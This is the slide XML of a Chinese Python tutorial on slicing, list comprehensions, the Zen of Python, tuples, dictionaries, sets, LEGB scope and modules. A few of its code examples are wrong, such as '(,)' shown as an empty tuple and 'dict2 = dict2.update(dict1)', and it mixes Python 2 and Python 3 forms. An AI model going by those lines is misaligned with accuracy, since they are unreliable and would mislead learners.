            <a:ext cx="8638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8200"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>切片</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[start : end : step]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008200"/>
              </a:solidFill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step+ :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从左向右看，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为起始索引，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>索引最大值是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(list)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>step- :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>从右向左看，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为起始索引，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>索引最大值是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不包含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]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76020"/>
            <a:ext cx="4688010" cy="33285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52835"/>
            <a:ext cx="3704661" cy="274570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40499" y="164505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控制台输出：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11635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19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12793" y="154543"/>
            <a:ext cx="28595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复杂列表推导式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="278828" y="699542"/>
            <a:ext cx="3938609" cy="3600986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#coding:utf-8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 f(v):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if v%2 == 0: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v=v**2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v=v+1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v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p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a=[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f(v) for v in [2,4,3,-1] if v&gt;0]</a:t>
            </a:r>
          </a:p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b=[ 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v**2 if v%2==0 else v+1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v in [2,4,3,-1] if v&gt;0 ]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print(a, b)</a:t>
            </a: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&gt;&gt;&gt;[4, 16, 4]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&gt;&gt;&gt;[4, 16, 4]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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0032" y="776060"/>
            <a:ext cx="37444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#与zip结合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[-1, -2, -3, -4, -5]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[1, 2, 3, 4, 5,]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xy = [[x, y] for x, y in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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(a, b)]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print(xy)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&gt;&gt;&gt;[[-1, 1], [-2, 2], [-3, 3], [-4, 4], [-5, 5]]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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#支持for多层嵌套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[[1, 2, 3], [4, 5, 6], [7, 8, 9]]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[j for i in a for j in i]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print(b)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&gt;&gt;&gt;[1, 2, 3, 4, 5, 6, 7, 8, 9]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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23765"/>
            <a:ext cx="3281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之禅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084168" y="620151"/>
            <a:ext cx="2592288" cy="412340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优美胜过丑陋 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明确胜过含蓄 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简单胜过复杂 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复杂胜过难懂 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扁平胜过嵌套 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稀疏胜过密集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重要的是可读性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特殊的案例不足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以特殊到破坏规则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尽管实践可以打破真理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错误却不可置之不理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除非另有明确要求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>面对模棱两可，拒绝猜测</a:t>
            </a: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 . . . . .</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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557799"/>
            <a:ext cx="54726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Beautiful is better than ugly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Explicit is better than implicit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Simple is better than complex.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Complex is better than complicated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Flat is better than nested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Sparse is better than dense.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Readability counts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Special cases aren't special enough to break the rules.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Although practicality beats purity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Errors should never pass silently.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Unless explicitly silenced.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>In the face of ambiguity, refuse the temptation to guess.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>There should be one-- and preferably only one --obvious way to do it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Although that way may not be obvious at first unless you're Dutch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Now is better than never.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Although never is often better than *right* now.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>If the implementation is hard to explain, it's a bad idea.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>If the implementation is easy to explain, it may be a good idea.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Namespaces are one honking great idea -- let's do more of those!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95" y="246981"/>
            <a:ext cx="1896169" cy="18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12793" y="154543"/>
            <a:ext cx="28595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元组 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>tuple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12793" y="1430754"/>
            <a:ext cx="8229600" cy="338500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创建</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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 = (2,3,4,5) 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# A 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tuple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of integers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 = (,) 	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# An empty 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tuple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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 = (2, [3,4], (10,11,12))  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 tuple containing mixed objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN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操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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 = f[1] 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# Element access. x = 3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 = f[1:3] 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# Slices. y = (3,4)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z = h[1][1] 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# Nesting. z = 4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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特色</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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与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list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类似，最大不同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tuple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是一种只读且不可变更的数据结构</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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不可取代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tuple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中的任意一个元素，因为它是只读不可更改的，也不能进行像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list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一样的加法操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213965" y="584719"/>
            <a:ext cx="8678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元组与列表类似，可通过索引访问，支持异构，任意嵌套。不同之处在于元组的元素不能修改。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22862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4056" y="169297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元组相关操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4355976" y="608669"/>
            <a:ext cx="40191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400" dirty="0"/>
              <a:t>任意无符号的对象，以逗号隔开，默认为元组</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/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400" dirty="0"/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400" dirty="0"/>
              <a:t>元组里的对象不可变</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>tup5[3]=[2,3] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>NO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CN" sz="1400" dirty="0"/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400" dirty="0"/>
              <a:t>元组中可变对象内容可变 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>tup5[3].append(4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YES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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4341975" y="2088067"/>
            <a:ext cx="4550505" cy="2524880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="内容占位符 2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5" y="608668"/>
            <a:ext cx="4018447" cy="3983906"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3597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125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变量之字典</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213965" y="603905"/>
            <a:ext cx="8435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字典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{key1:value1, key2:value2 …}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键必须唯一且不可变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字符串，数字或元组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值可是任意类型对象。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16804" y="1368922"/>
            <a:ext cx="8229600" cy="32874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赋值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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= { } 			#An empty dictionary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= { 'x': 3, 'y': 4 }	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有点类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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json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格式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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= { '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uid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': 105,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   'login': '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oa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   'name' : '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wangcai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操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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 = c['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uid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'] 		#Get an element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c['shell'] = "/bin/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	#Set an element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dict2 = dict2.update(dict1) #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使用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dict1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中的数据去更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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dict2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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c.has_key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("directory"):  #Check for presence of an member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d = c['directory']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d = None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 = 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c.get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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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directory",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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None</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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带默认值的方式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22936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84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变量之集合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213965" y="617496"/>
            <a:ext cx="6806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集合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set([1, 2, 3])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是一组无序不重复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的集合。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85822" y="1053397"/>
            <a:ext cx="7814569" cy="360658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&gt;&gt;&gt; set( ["hello", "world", "of", "words", "of", "world"] )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set(['world', 'hello', 'words', 'of'])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endParaRPr lang="en-US" altLang="zh-CN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如何删除重复数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Ls1 = [1,3,5,3,7,4,5]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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Ls2 = list(set(Ls1))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endParaRPr lang="en-US" altLang="zh-CN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可以使用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&amp;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、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|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求两个</a:t>
            </a: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</a:t>
            </a:r>
            <a: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的交集、并集、补集、全集</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US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s1 = set([1,2,3])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s2 = set([2,4])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s1 &amp; s2		#{2} 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s1 | s2		#{1,2,3,4} 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s1 - s2		#{1,3}</a:t>
            </a:r>
            <a:b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s1 ^ s2		#{1,3,4}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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84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变量之字典与集合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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4674486" y="569926"/>
            <a:ext cx="4217993" cy="4138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5" y="569926"/>
            <a:ext cx="4367677" cy="41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2764" y="482304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60599" y="159183"/>
            <a:ext cx="25832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中的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52" y="2680023"/>
            <a:ext cx="3412879" cy="20523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620" y="584023"/>
            <a:ext cx="3412879" cy="2073422"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1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051698"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="333722" y="590193"/>
          <a:ext cx="3227388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" name="Visio" r:id="rId6" imgW="4366954" imgH="5446897" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId6" imgW="4366954" imgH="5446897" progId="Visio.Drawing.11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22" y="590193"/>
                        <a:ext cx="3227388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0604" y="1491630"/>
            <a:ext cx="440981" cy="9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67701"/>
            <a:ext cx="309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变量作用域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8986" y="3637622"/>
            <a:ext cx="1854696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#块级作用域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if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lzl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(name)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39752" y="3443133"/>
            <a:ext cx="201622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局部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作用域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rgbClr val="FF7800"/>
              </a:solidFill>
              <a:effectLst/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kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="1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lzl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(name)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427984" y="3198554"/>
            <a:ext cx="20162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全局部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作用域</a:t>
            </a:r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lvl="0"/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ame=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o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lang="zh-CN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lzl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(name)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588224" y="2668126"/>
            <a:ext cx="20162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嵌套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域链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lzl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lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008200"/>
              </a:solidFill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78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f1():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Lee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lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008200"/>
              </a:solidFill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78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f2():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lang="zh-CN" alt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lang="zh-CN" alt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Chen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill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lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF1493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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="14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1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2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0082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5" name="矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="213965" y="617173"/>
            <a:ext cx="8604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LEGB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1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含义解释：</a:t>
            </a:r>
            <a:b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</a:b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L-Local(function)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函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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或</a:t>
            </a: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）中的名字），并且没有在函数中声明为全局</a:t>
            </a:r>
            <a:b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</a:b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E-Enclosing function locals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局部闭包函数（局部作用域内明明的闭包函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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或者 </a:t>
            </a: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）</a:t>
            </a:r>
            <a:b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</a:b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G-Global(module)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模块文件顶层的名字，或者在文件内的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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中声明为</a:t>
            </a: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global</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US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</a:b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B-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="16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Builtin</a:t>
            </a:r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(Python)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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预定义在内部模块中的名字 : open,range,SyntaxError,...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LEGB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1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符号表的搜索顺序是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1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Local-&gt; Enclosing Function-&gt; Global-&gt; Built-in</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="395094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67701"/>
            <a:ext cx="309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变量作用域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959830" y="775820"/>
            <a:ext cx="3932934" cy="1683359"/>
            <a:chOff x="4572000" y="677676"/>
            <a:chExt cx="3528392" cy="1296554"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4572000" y="677676"/>
              <a:ext cx="3528392" cy="1296554"/>
              <a:chOff x="4716016" y="627124"/>
              <a:chExt cx="3528392" cy="1296554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860032" y="771550"/>
                <a:ext cx="1368152" cy="100811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f():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num=2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print </a:t>
                </a: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f()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 num</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200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732240" y="771550"/>
                <a:ext cx="1368152" cy="100811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f():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print </a:t>
                </a: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num = 2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f()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 num</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1200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716016" y="627124"/>
                <a:ext cx="3528392" cy="129655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0"/>
                <a:endCxn id="18" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6480212" y="627124"/>
                <a:ext cx="0" cy="129655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135"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6147544" y="1029676"/>
              <a:ext cx="377302" cy="592554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629184" y="2563382"/>
            <a:ext cx="2528778" cy="203812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g_a=1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f2():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l_b</a:t>
            </a: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=g_a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print(g_a,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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l_b</a:t>
            </a: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g_a</a:t>
            </a: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zh-CN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pt-BR" altLang="zh-CN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g_a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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zh-CN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735630"/>
            <a:ext cx="2207369" cy="1723549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不伦不类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g_name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f1():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(name)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f2():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l_n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f1()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f2()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1520" y="2859782"/>
            <a:ext cx="2207369" cy="1723549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 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g_name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f1():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(name)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def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f2():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name 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l_name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return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f1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 f2()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fp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1158356" y="2547884"/>
            <a:ext cx="215280" cy="232141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577226" y="756679"/>
            <a:ext cx="2264267" cy="3555349"/>
            <a:chOff x="2577226" y="724479"/>
            <a:chExt cx="2264267" cy="355534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77226" y="724479"/>
              <a:ext cx="2264267" cy="3054292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2850758" y="3941274"/>
              <a:ext cx="1584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规则套用不上？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牛皮纸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3812" r="3680" b="4240"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1081694" y="915566"/>
            <a:ext cx="3710701" cy="22672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28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69115" y="157359"/>
            <a:ext cx="2269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/>
              <a:t>模块与包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70" y="886991"/>
            <a:ext cx="4369858" cy="3128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47664" y="1419622"/>
            <a:ext cx="3032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zh-CN" alt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在手</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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天下我有！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17041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5892" y="479956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4AEDA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>29</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="14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3529" y="154543"/>
            <a:ext cx="2736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Modules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与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9552" y="1042634"/>
            <a:ext cx="3349923" cy="34563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b="1" dirty="0">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># numbers.py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 err="1">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> divide(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a,b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>):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q = a/b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r = a - q*b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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>q,r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0">
              <a:latin typeface="Bitstream Vera Sans Mono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dirty="0">
              <a:latin typeface="Bitstream Vera Sans Mono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 err="1">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>def</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>calc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:latin typeface="Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
